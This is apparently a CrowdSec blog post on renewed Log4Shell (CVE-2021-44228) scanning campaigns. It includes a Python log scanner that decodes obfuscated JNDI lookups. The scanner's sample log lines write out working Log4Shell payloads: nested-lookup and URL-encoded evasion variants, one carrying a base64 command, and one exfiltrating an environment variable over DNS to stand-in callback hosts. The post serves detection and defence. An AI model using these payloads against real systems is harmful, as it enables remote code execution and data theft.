CVE-2021-44228 (Log4j Scanning Campaign) Is Back and Stronger than Ever
May 2025 by CrowdSec
Active Scanning Campaigns for Log4j (CVE-2021-44228) in Full Force
More than three years after the vulnerability was disclosed, the CrowdSec Network still detects active campaigns targeting Log4Shell and the same class of exploits.
About the exploit
Log4Shell (CVE-2021-44228) is a remote code execution vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1): the library resolved `${jndi:...}` lookups inside strings it logged, so an attacker who could get a crafted string logged (a User-Agent header, a query parameter) could make the server fetch and load a class from an attacker-controlled LDAP or RMI server. Its disclosure in December 2021 ruined the Christmas holidays for most security teams. Today the same exploit is still abused by small-time groups looking for easy targets from which to launch more dangerous attacks.
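As an added illustration (this is not CrowdSec's code or detection logic), the script below shows what these probes look like in a web server access log and how to undo the two evasion tricks scanners rely on: URL encoding and nested lookups such as `${lower:j}` or `${::-j}`, which Log4j itself resolves before the JNDI lookup and which defeat a naive substring match on `jndi`. The log lines are constructed, and the callback addresses use RFC 5737 documentation ranges.

```python
"""Spot Log4Shell (CVE-2021-44228) probes in web server access logs.

Added example, not CrowdSec's code. Scanners hide the ${jndi:...} lookup
behind URL encoding and nested lookups such as ${lower:j} or ${::-j}; Log4j
resolves those before the JNDI lookup, so a detector has to do the same.
"""
import re
from typing import Optional
from urllib.parse import unquote

# A lookup with no further ${...} nested inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What remains once the obfuscation layers are peeled off.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)", re.I)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the lookups scanners abuse."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)                 # this is the lookup we are hunting; keep it intact
    if ":-" in body:                      # ${::-j} or ${env:NaN:-j}: undefined key, default value wins
        return body.rsplit(":-", 1)[1]
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return body                           # unknown lookup (e.g. env:HOSTNAME): keep the text for analysts


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (possibly repeated) URL encoding, then collapse nested lookups until stable."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = _INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_probe(line: str) -> Optional[dict]:
    """Return the JNDI scheme and callback host:port if the line carries a Log4Shell lookup."""
    m = _JNDI.search(normalize(line))
    if m is None:
        return None
    return {"scheme": m.group(1).lower(), "callback": m.group(2)}


# Constructed access-log lines (combined log format); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/May/2025:10:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [20/May/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.10:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==}"',
    '198.51.100.8 - - [20/May/2025:10:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.11%3A1099%2FExploit%7D HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [20/May/2025:10:00:04 +0000] "GET /?s=${jndi:dns://${env:HOSTNAME}.203.0.113.12/a} HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.5 - - [20/May/2025:10:00:05 +0000] "GET /docs?template=${version} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (line_number, finding) for every line that carries a probe."""
    return [(i, hit) for i, line in enumerate(lines, 1) if (hit := find_jndi_probe(line))]


if __name__ == "__main__":
    for lineno, hit in scan(SAMPLE_LOG):
        print(f"line {lineno}: {hit['scheme']} callback -> {hit['callback']}")
```

The fourth sample is the data-exfiltration variant, where an environment variable is smuggled out as a DNS label; the normalizer deliberately keeps the unknown `env:` lookup text so an analyst can see what the probe was trying to read. The last line carries an innocent `${version}` template string and is correctly left alone.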
Key findings
Attackers use simple, well-known exploits such as the Log4j CVE to compromise machines hosted at VPS (virtual private server) providers.
These compromised machines are then used for targeted exploitation campaigns against bigger fish, such as enterprise accounts, with the VPS hiding the attackers' real origin.
Chains like this one have fuelled a surge in so-called “Dedic” (dedicated server) resellers: attackers gain access to cheap VPSs and sell them on demand to other groups on dark web markets.
The campaign shown in the trend analysis below is one of many such attempts to capture a batch of VPSs for resale.
Trend analysis
20th of May: The CrowdSec network detected a rapid surge in machines targeting CVE-2021-44228, with over 95% of them hosted at DigitalOcean, a VPS provider. The CrowdSec monitoring service assigned the group the tag “Magical Peachpuff Scimitarbill”.
20th - 24th of May: Within four days, the campaign hit over 1000 machines connected to the CrowdSec network with a diverse selection of exploits for popular open source applications, such as CVE-2021-41773 (Apache HTTP Server path traversal) and CVE-2021-43798 (Grafana path traversal).
25th of May: The machines disappeared, presumably after intervention by DigitalOcean.
How to protect your systems
The CrowdSec Network of decentralized agents detected this trend early. If you are running CrowdSec, you are likely already protected: CrowdSec Remediation Components block the IPs flagged by the network in real time. Blocking scanners complements, rather than replaces, upgrading any Log4j 2 you still run to a fixed release (2.17.1 or later; 2.12.4 and 2.3.2 for the Java 7 and Java 6 branches).
Stay informed: Use CrowdSec CTI to explore the IPs used in the campaign.
Stay proactive: Install the CrowdSec Web Application Firewall to stay ahead of exploit attempts, with 100+ virtual patching rules available.
Sharing insights and taking swift action can collectively reduce the impact of these threats. This is your call to action for real-time threat intelligence and collaborative cybersecurity.